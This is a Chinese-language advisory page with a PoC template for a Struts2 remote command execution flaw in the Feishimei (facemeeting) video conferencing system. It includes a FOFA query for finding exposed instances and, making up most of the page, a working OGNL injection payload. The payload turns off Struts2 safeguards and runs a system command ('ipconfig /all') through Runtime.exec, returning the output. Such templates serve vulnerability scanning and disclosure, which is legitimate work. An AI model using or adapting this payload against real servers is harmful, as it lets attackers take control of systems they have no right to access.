facemeeting-struts2-rce: 飞视美 视频会议系统 Struts2 远程命令执行漏洞

日期: 2025-09-01 | 影响软件: facemeeting | POC: 已公开

漏洞描述

飞视美(facemeeting):facemeeting,即飞视美,隶属飞鱼星科技有限公司,坐落在四川成都,以SAAS模式提供国际标准的多媒体通讯服务,为即租即用的全新一代视频会议产品。飞视美专注提供高效、智能的视频会议解决方案,服务中小企业各类会议、协同办公等领域,通过网络进行异地实时的音视频沟通,协助中小企业构建高效、智能的统一通信系统平台。飞视美 视频会议系统存在Struts2远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限。 fofa-query: app="飞视美-视频会议系统"

PoC代码[已公开]

id: facemeeting-struts2-rce

info:
  name: 飞视美 视频会议系统 Struts2 远程命令执行漏洞
  author: daffainfo
  severity: critical
  verified: true
  description: |
    飞视美(facemeeting):facemeeting,即飞视美,隶属飞鱼星科技有限公司,坐落在四川成都,以SAAS模式提供国际标准的多媒体通讯服务,为即租即用的全新一代视频会议产品。飞视美专注提供高效、智能的视频会议解决方案,服务中小企业各类会议、协同办公等领域,通过网络进行异地实时的音视频沟通,协助中小企业构建高效、智能的统一通信系统平台。飞视美 视频会议系统存在Struts2远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限。
    fofa-query: app="飞视美-视频会议系统"
  reference:
    - https://mp.weixin.qq.com/s/mBAaR8bA2eibUgBcLDipfA
    

rules:
  r0:
    request:
      method: POST
      path: /confinfoaction!showallConfinfos.action
      body: |
        ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'ipconfig /all\'')(d))&(h)(('\43myret\75@java.lang.Runtime@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))
    expression: response.status == 200 && response.body.bcontains(b'Windows IP')
expression: r0()

相关漏洞推荐